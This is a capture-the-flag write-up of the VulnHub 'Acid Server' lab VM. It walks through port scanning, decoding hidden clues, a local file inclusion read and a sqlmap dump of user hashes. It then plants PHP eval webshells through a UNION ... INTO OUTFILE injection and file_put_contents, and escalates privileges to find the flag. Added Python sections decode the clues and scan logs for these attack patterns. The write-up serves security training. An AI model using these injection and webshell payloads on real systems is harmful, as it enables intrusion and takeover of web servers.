VulnHub-Acid Server Writeup

Goal

Escalate the privileges to root and capture the flag. Once anyone is able to beat the machine, please let me know.

Information gathering

Port scan

nmap -p 1-65535 -T4 -A -v 192.168.1.101

PORT      STATE SERVICE VERSION
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: /Challenge
MAC Address: 00:0C:29:6F:66:8B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.840 days (since Sun Oct 7 03:09:34 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

Page information

The index.php source contains a doubly encoded string (hex -> base64 -> plaintext):
0x643239334c6d70775a773d3d
d293LmpwZw==
wow.jpg

strings wow.jpg

"""%%%)))///333777999>>>@@@DDDKKKOOORRRUUU[[[^^^cccfffkkknnnssswwwxxx~~~

"%)/379>@DKORU[^cfknswx~

37:61:65:65:30:66:36:64:  
35:38:38:65:64:39:39:30:
35:65:65:33:37:66:31:36:
61:37:63:36:31:30:64:34

7:a:e:e:0:f:6:d
5:8:8:e:d:9:9:0
5:e:e:3:7:f:1:6
a:7:c:6:1:0:d:4

63425

Directory: /Challenge

Directory scan with dirbruter

Files found under /Challenge:
index.php
error.php
cake.php
hacked.php
include.php

Exploiting the file inclusion vulnerability

The include.php page source contains the same kind of encoded string (hex -> base64 -> plaintext):
0x59 33 56 6a 4c 6e 4a 34 62 6e 41 3d
Y3VjLnJ4bnA=
cuc.rxnp
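The hex-then-base64 layering seen in index.php and include.php, and the colon-separated hex dump pulled out of wow.jpg, can be peeled automatically. This is an added example, not code from the writeup; the rot13-and-reverse helper goes one step beyond the page, but it maps cuc.rxnp to cake.php, a file the directory scan did list.

```python
import base64
import codecs
import re

# Added example (not from the writeup): peel the hex / base64 layers found in
# the page sources, e.g. 0x643239334c6d70775a773d3d -> d293LmpwZw== -> wow.jpg.

# The colon-separated hex dump from "strings wow.jpg", copied from the writeup.
HEX_DUMP = """37:61:65:65:30:66:36:64:
35:38:38:65:64:39:39:30:
35:65:65:33:37:66:31:36:
61:37:63:36:31:30:64:34"""

HEX_RE = re.compile(r"[0-9a-fA-F]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def unwrap(value: str) -> list[str]:
    """Return every layer, outermost first, until nothing decodes cleanly."""
    layers = [value]
    while True:
        cur = layers[-1].strip()
        # Accept 0x-prefixed, space-separated or colon-separated hex.
        compact = re.sub(r"^0x|[\s:]", "", cur)
        try:
            if HEX_RE.fullmatch(compact) and len(compact) % 2 == 0:
                nxt = bytes.fromhex(compact).decode("ascii")
            elif B64_RE.fullmatch(cur) and len(cur) % 4 == 0:
                nxt = base64.b64decode(cur, validate=True).decode("ascii")
            else:
                break
        except ValueError:  # bad hex/base64 or non-ASCII bytes: stop here
            break
        if not nxt.isprintable():
            break
        layers.append(nxt)
    return layers


def rot13_reverse(value: str) -> str:
    """rot13 then reverse: the transform that turns cuc.rxnp into cake.php."""
    return codecs.decode(value, "rot13")[::-1]


if __name__ == "__main__":
    for sample in ("0x643239334c6d70775a773d3d",
                   "0x59 33 56 6a 4c 6e 4a 34 62 6e 41 3d", HEX_DUMP):
        print(" -> ".join(unwrap(sample)))
```

The hex dump stops after one layer because its 32-character result decodes to non-ASCII bytes, which is the signal that it is a hash-like value rather than another encoding.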

Read the source of hacked.php through the inclusion:

http://192.168.1.103:33447/Challenge/include.php?file=php://filter/convert.base64-encode/resource=hacked.php&add=Extract+File

<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php';

sec_session_start();

if (!isset($_SESSION['protected_page'])){
header('Location: protected_page.php');
exit;
}
if (!isset($_SESSION['index_page'])){
header('Location: protected_page.php');
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="styles/main.css" />
<title>Try to Extract Juicy details</title>
</head>
<body>
<div class="wrapper">
<div class="container">
<?php
if(isset($_REQUEST['add']))
{
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'mehak';
$conn = mysql_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{
die('Could not connect: ' . mysql_error());
}

$id = $_POST['id'];
$sql = "SELECT * FROM members WHERE ID = (('$id'))";
mysql_select_db('secure_login');
$retval = mysql_query( $sql, $conn );
if(! $retval )
{
die('Could not enter data: ' . mysql_error());
}
echo "You have entered ID successfully...Which is not a big deal :D\n";
mysql_close($conn);
}
?>
<p> <h1>You are going Good...Show me your Ninja Skills.</h1> <br>
<form method="get" action="<?php $_PHP_SELF ?>">
Enter your ID:<input name="id" placeholder="id" type="text" id="id" maxlength="20">
<input name="add" type="submit" id="add" value="Add ID">

</body>
</html>

The id parameter is used unsanitised in the query, so there is a SQL injection vulnerability; run sqlmap against it:

sqlmap.py -u "http://192.168.1.103:33447/Challenge/hacked.php" --data "add=1&id=1" --cookie="sec_session_id=4ua5he692ts3mo6c71oo6i6qn7" --dump -C "email,password,username" -T "members" -D "secure_login"
+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+
| email | password | username |
+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+
| acid@gmail.com | 53b9bd4416ec581838c4bde217e09f1206b94cdb95475cddda862894f4dbbeec5ceacc2e116a64cb56d8384404738c5fd16478e0266962eeb3b61da1918d5931 | Acid |
| saman.j.l33t@gmail.com | c124191d7a267cb2b83b2c59a30b2e388b77f13955340015462bffc0d90cfa7b402ecb8e3fc82717f22b127c98a4afa9ed4f3661d824c6c57a1490f9963d9234 | saman |
| test@example.com | 00807432eae173f652f2064bdca1b61b290b52d40e429a7d295d76a71084aa96c0233b82f1feac45529e0726559645acaed6f3ae58a286b9f075916ebf66cacc | test_user |
| vik.create@gmail.com | fb8db054a75254633052d951002065109cd96fe990bf5a5d5bd1581d3578235a69224784b29870046d21d95567cdfe292221fbabce17201b23ca0fd5ee4fa20e | Vivek |
+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+

None of the hashes could be cracked.

Tried the following password combinations:
cuc.rxnp63425
63425cuc.rxnp
Both failed.

Writing a webshell via SQL injection

id=1')) union select 1,2,3,4,'<?php @eval($_POST[cmd]); ?>' into outfile '/tmp/123.php'--%20%20

The one-line webshell was written successfully; include it through include.php:
http://192.168.1.104:33447/Challenge/include.php?file=/tmp/123.php&add=Extract+File
POST: cmd=phpinfo();

phpinfo was displayed successfully, revealing the web root /var/www/html/Challenge/. Because include.php requires the session cookie, connecting through Caidao (China Chopper) is awkward, so write a second one-line webshell into that directory:
cmd=file_put_contents("/var/www/html/Challenge/hack.php","<?php @eval($_POST[a]); ?>");&a=$_POST[a]
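From the defender's side, every request in the chain above (the php://filter source read, the UNION ... INTO OUTFILE write, the include of /tmp/123.php) is visible in the Apache access log. Added example, not code from the writeup: the log lines are constructed to mirror those requests and were not captured from the VM; the client IPs and the sqlmap user-agent string are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example (not from the writeup). Constructed Apache combined-format log
# lines that mirror the requests made in the writeup; not captured from the VM.
SAMPLE_LOG = """\
192.168.1.50 - - [22/Apr/2019:10:01:02 +0000] "GET /Challenge/include.php?file=php://filter/convert.base64-encode/resource=hacked.php&add=Extract+File HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
192.168.1.50 - - [22/Apr/2019:10:02:15 +0000] "GET /Challenge/hacked.php?id=1%27%29%29+union+select+1%2C2%2C3%2C4%2C%27%3C%3Fphp+%40eval%28%24_POST%5Bcmd%5D%29%3B+%3F%3E%27+into+outfile+%27%2Ftmp%2F123.php%27--+&add=Add+ID HTTP/1.1" 200 512 "-" "sqlmap/1.3"
192.168.1.50 - - [22/Apr/2019:10:03:40 +0000] "GET /Challenge/include.php?file=/tmp/123.php&add=Extract+File HTTP/1.1" 200 98 "-" "Mozilla/5.0"
192.168.1.77 - - [22/Apr/2019:10:04:01 +0000] "GET /Challenge/index.php HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
"""

# ip ident user [time] "method path proto" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
SQLI_RE = re.compile(r"union\s+select|into\s+(?:out|dump)file", re.I)
WRAPPER_RE = re.compile(r"^(?:php|data|expect|phar|zip|file)://", re.I)


def analyse_request(path: str, user_agent: str) -> list[str]:
    """Return the reasons one request looks like the LFI / SQLi chain above."""
    reasons = []
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:  # parse_qs has already URL-decoded the value
            if name == "file":
                if WRAPPER_RE.match(value):
                    reasons.append("lfi:stream-wrapper")
                elif value.startswith("/"):
                    reasons.append("lfi:absolute-path")
                elif "../" in value:
                    reasons.append("lfi:traversal")
            if SQLI_RE.search(value):
                reasons.append(f"sqli:{name}")
            if "<?php" in value:
                reasons.append(f"php-code-in-param:{name}")
    if "sqlmap" in user_agent.lower():
        reasons.append("ua:sqlmap")
    return reasons


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, script path, reasons) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, _status, user_agent = m.groups()
        reasons = analyse_request(path, user_agent)
        if reasons:
            findings.append((ip, urlsplit(path).path, reasons))
    return findings


if __name__ == "__main__":
    for ip, script, reasons in scan_log(SAMPLE_LOG):
        print(ip, script, ", ".join(reasons))
```

The hacked.php form submits with GET, so the id value lands in the access log; when the injection travels in a POST body instead, as in the sqlmap --data run above, the default access log keeps only the request line and the body-based checks need a WAF or application-level logging.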

Connect with Caidao (China Chopper)

Privilege escalation

In /Challenge there is a file named VXNlcnMudHh0, which base64-decodes to Users.txt.
Contents: zbp.yvnzt@qvpn

Y0dGemN5NTBlSFE9 decodes to pass.txt.
Contents: __341xnurZ

Search for files owned by the user:

find / -user acid 2>/dev/null

This turned up a packet capture; analysing it revealed saman's password: 1337hax0r

Switch to that user and find flag.txt.

Summary

Problems

1. Far too much time went into web exploitation, even though the vulnerabilities were not hard to exploit.
2. After getting a shell I did not know how to escalate privileges, and browsed files at random with no direction.

Solutions

Work from the objective:

  • The purpose of exploiting a web vulnerability is to get a shell; with that in mind, exploit it in the fastest, simplest and least noisy way that yields a shell.
  • The essence of penetration is information gathering: collect detailed information about the target (ports, directories, user files, system files, installed software and so on); the more detail, the better.